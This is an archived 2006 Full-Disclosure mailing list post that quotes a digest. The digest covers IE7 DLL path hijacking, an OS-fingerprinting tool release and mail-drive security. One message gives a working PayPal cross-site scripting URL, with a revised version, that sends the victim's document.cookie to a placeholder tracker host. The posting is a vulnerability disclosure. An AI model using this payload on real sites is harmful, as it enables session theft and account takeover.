[<prev] [next>] [day] [month] [year] [list]
Message-ID: <ed01adde0611061008m3c4cfb91u43c043f19d20f10d@mail.gmail.com>
Date: Mon, 6 Nov 2006 13:08:59 -0500
From: Fig <digital.figlet@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: help
help
On 11/6/06, full-disclosure-request@...ts.grok.org.uk
<full-disclosure-request@...ts.grok.org.uk> wrote:
> Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
> You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
>
> Today's Topics:
>
> 1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven
> (Joshua Gimer)
> 2. SinFP 2.04 release, works under Windows (GomoR)
> 3. Re: Mail Drives Security Considerations (gabriel rosenkoetter)
> 4. Re: alert() (Matthew Flaschen)
> 5. Re: Mail Drives Security Considerations (Darkz)
> 6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven
> (Roger A. Grimes)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 4 Nov 2006 13:15:35 -0700
> From: "Joshua Gimer" <jgimer@...il.com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
> Writers' Heaven
> To: "Eliah Kagan" <degeneracypressure@...il.com>
> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
> Message-ID:
> <cf939bff0611041215u28faffd5j211562633f7a9b3d@...l.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> If Microsoft is not planning on providing a fix for this until Vista, I can
> see a worm coming from this. Forgive me if I don't know how this works in
> the windows world, but when it is looking for this DLL, does it take the
> first one that it finds within your path; like in UNIX? Or does it look in
> all directories within your path and then decide? I am guessing the former,
> but I am just clarifying.
>
> On 11/3/06, Eliah Kagan <degeneracypressure@...il.com> wrote:
> >
> > On 11/2/06, Roger A. Grimes wrote:
> > > So, if you're statement is accurate that malware would need to be placed
> > > in a directory identified by the PATH statement, we can relax because
> > > that would require Administrator access to pull off. Admin access would
> > > be needed to modify the PATH statement appropriately to include the
> > > user's desktop or some other new user writable location or Admin access
> > > would be needed to copy a file into the locations indicated by the
> > > default PATH statement.
> >
> > It would not require *administrator* access--non-administrator users
> > can still add things to their own PATHs, just not to the universal,
> > system PATH. (See Control Panel > System > Advanced > Environment
> > Variables.)
> >
> > -Eliah
> >
>
>
>
> --
> Thx
> Joshua Gimer
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html
>
> ------------------------------
>
> Message: 2
> Date: Sun, 5 Nov 2006 20:02:28 +0100
> From: GomoR <fd@...or.org>
> Subject: [Full-disclosure] SinFP 2.04 release, works under Windows
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <20061105190228.GD23011@...ima.enslaved.lan>
> Content-Type: text/plain; charset=us-ascii
>
> Hi,
>
> I'm pleased to announce the availability of SinFP 2.04, which now can
> run under Windows ActivePerl.
>
> SinFP is a new approach to active and passive OS fingerprinting, you can
> know more about its features here:
> http://www.gomor.org/sinfp
>
> SinFP has now more than 130 signatures in its database.
>
> To be informed about new signature files, subscribe to:
> http://lists.sourceforge.net/lists/listinfo/sinfp-discuss
>
> Installation instruction can be found here:
> http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3
>
> For Windows users, follow these instructions:
>
> This was tested with ActivePerl 5.8.8.819, with PPM v4.0.
>
> # If you are behind a proxy:
> C:\> set http_proxy=http://username:password@...xy:port
>
> # Add gomor repository
> C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx
>
> # Disable all other repo, if you have many. Or only ActiveState repo
> # by default
> C:\> ppm repo 1 off
> ...
> C:\> ppm install Net-SinFP
>
> # Re-enable all other repo
> C:\> ppm repo 1 on
> ...
>
> Launch it:
> C:\> perl C:\perl\site\bin\sinfp.pl
>
> If you have error messages about failing to load some .dll, go to
> www.microsoft.com. Then, in the search field, type in vcredist_x86.exe,
> download it and install it.
>
> Please, do not hesitate to submit new signatures to sinfp_at_gomor.org,
> or on the mailing list.
>
> Best regards,
>
> --
> ^ ___ ___ http://www.GomoR.org/ <-+
> | / __ |__/ Systems & Security Engineer |
> | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |
> +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+
>
>
>
> ------------------------------
>
> Message: 3
> Date: Sun, 5 Nov 2006 18:18:10 -0500
> From: gabriel rosenkoetter <gr@...ipsed.net>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <20061105231810.GD36176@...w.eclipsed.net>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:
> > Why can't message signing offer backwards compatibility (assuming you
> > use multipart/signed)?
>
> Seems to me that adding a PGP signature verification to every
> operation on files (even ls(1); you have to check to make sure it's
> not a spoofed file) would rather noticeably impact the
> performance of what's already got to be pretty slow on most users'
> connections, and it adds a layer of complexity to the setup (you
> have to generate the key pair, and have the private key available on
> any system which you intend have write access) but that would certainly
> work. Spam will still be a DoS against storage space, of course.
>
> Never mind that this software violates gmail's acceptable use
> policy and is transmitted back and forth in the clear (unless you
> want to roll PGP encryption into the mix, in which case keeping
> paths in the clear in the subject breaks the security), so it'd be
> hard to view data stored this way as being "secure" to begin with...
>
> --
> gabriel rosenkoetter
> gr@...ipsed.net
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Sun, 05 Nov 2006 22:24:25 -0500
> From: Matthew Flaschen <matthew.flaschen@...ech.edu>
> Subject: Re: [Full-disclosure] alert()
> To: Matthew Flaschen <matthew.flaschen@...ech.edu>
> Cc: full-disclosure@...ts.grok.org.uk, spoof@...pal.com
> Message-ID: <454EAAE9.9030500@...ech.edu>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hmm, I got an email from Paypal, saying
>
> "Thank you for bringing this incident of suspicious activity to our
> attention. PayPal will investigate this activity immediately and contact
> you further if any additional information is required.[...]"
>
> I'm fairly certain they're referring to this exploit, which I CCed them
> on my previous post.
>
> Also, the POC I posted no longer works. It looks like Paypal is no
> longer unescaping double quotation marks. Thus, the script fails to
> append the cookie. At any rate, just changing the double quotes to
> single quotes makes the POC work again:
>
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie
>
> Matt Flaschen
>
> Matthew Flaschen wrote:
> > Good find. How about using it to steal the entire PayPal cookie, though:
> >
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
> >
> >
> > auto113922@...h.ai wrote:
> >> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
> >> outside&voice=javascript:document.write('heh');alert('bl00p');
> >>
> >>
> >>
> >> Concerned about your privacy? Instantly send FREE secure email, no
> account required
> >> http://www.hushmail.com/send?l=480
> >>
> >> Get the best prices on SSL certificates from Hushmail
> >> https://www.hushssl.com?l=485
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 250 bytes
> Desc: OpenPGP digital signature
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin
>
> ------------------------------
>
> Message: 5
> Date: Mon, 06 Nov 2006 10:36:10 +0200
> From: Darkz <darkz.gsa@...il.com>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: Matthew Flaschen <matthew.flaschen@...ech.edu>,
> full-disclosure@...ts.grok.org.uk
> Message-ID: <454EF3FA.6040409@...il.com>
> Content-Type: text/plain; charset="us-ascii"
>
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html
>
> ------------------------------
>
> Message: 6
> Date: Sun, 5 Nov 2006 22:35:25 -0500
> From: "Roger A. Grimes" <roger@...neretcs.com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
> Writers' Heaven
> To: "Eliah Kagan" <degeneracypressure@...il.com>,
> <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>
> Message-ID:
> <096A04F511B7FD4995AE55F13824B8331983BB@...neretcs1.local.banneretcs.com>
>
> Content-Type: text/plain; charset="us-ascii"
>
> So all the malware writer has to do now is figure out how to do the
> initial exploit in the first place, that would then allow them to muck
> with path statements or place code in path executable areas. I mean, do
> you get it, yet? If the malware writer figures out how do the initial
> exploit, anything can be done, not just the path tricks.
>
> My WhereWindowsMalwareHides
> document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up
> dated_where_w.html)contains over 145 different tricks and locations
> where malware can hide and live, along with the path trick. Your point
> is a valid point, but it's been a known issue for years.
>
> You can't skip over the hardest part, the initial exploit, and start
> picking on one of over a hundred ways to muck with Windows users and
> call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like
> you're grasping at straws. At least tell us something new, and not
> something that's been documented for years.
>
> Roger
>
> -----Original Message-----
> From: Eliah Kagan [mailto:degeneracypressure@...il.com]
> Sent: Friday, November 03, 2006 9:26 PM
> To: full-disclosure@...ts.grok.org.uk; bugtraq@...urityfocus.com
> Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven
>
> On 11/2/06, Roger A. Grimes wrote:
> > So, if you're statement is accurate that malware would need to be
> > placed in a directory identified by the PATH statement, we can relax
> > because that would require Administrator access to pull off. Admin
> > access would be needed to modify the PATH statement appropriately to
> > include the user's desktop or some other new user writable location or
>
> > Admin access would be needed to copy a file into the locations
> > indicated by the default PATH statement.
>
> It would not require *administrator* access--non-administrator users can
> still add things to their own PATHs, just not to the universal, system
> PATH. (See Control Panel > System > Advanced > Environment
> Variables.)
>
> -Eliah
>
>
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 21, Issue 9
> **********************************************
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists